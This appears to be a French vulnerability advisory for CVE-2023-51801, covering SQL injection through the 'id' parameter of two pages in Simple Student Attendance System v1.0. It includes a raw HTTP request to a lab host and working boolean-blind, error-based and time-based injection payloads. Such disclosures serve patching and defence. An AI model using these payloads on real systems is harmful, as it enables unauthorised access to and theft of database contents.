
Système simple de gestion des présences des étudiants v.1.0 - Multiples vulnérabilités d'injection SQL - student_form.php et class_form.php
Description: Le Simple Student Attendance System v.1.0 est sujet à de multiples vulnérabilités d'injection SQL pouvant être exploitées par des attaquants authentifiés. Ces vulnérabilités existent dans student_form.php et class_form.php, permettant l'exécution de commandes SQL arbitraires via le paramètre 'id'.
Version du produit vulnérable : Simple Student Attendance System v.1.0
Auteur CVE : Geraldo Alcântara
Date : 29/11/2023
Confirmé le : 10/01/2024
CVE : CVE-2023-51801
Lien CVE : https://www.cve.org/CVERecord?id=CVE-2023-51801
Lien NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-51801
Lien Tenable : https://www.tenable.com/cve/CVE-2023-51801
Testé sur : Windows
Pour exploiter cette vulnérabilité, un attaquant doit naviguer vers les pages 'Student' ou 'Classes', où il peut ensuite modifier ou ajouter un étudiant ou une classe. La charge utile malveillante doit ensuite être insérée dans le paramètre 'id'.
Composant affecté :
Composants : student_form.php et class_form.php
Paramètre : id
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close
id=1'
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1''' AND 4206=4206-- KDFY
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh
Découvreur(s)/Crédits :
Geraldo Alcântara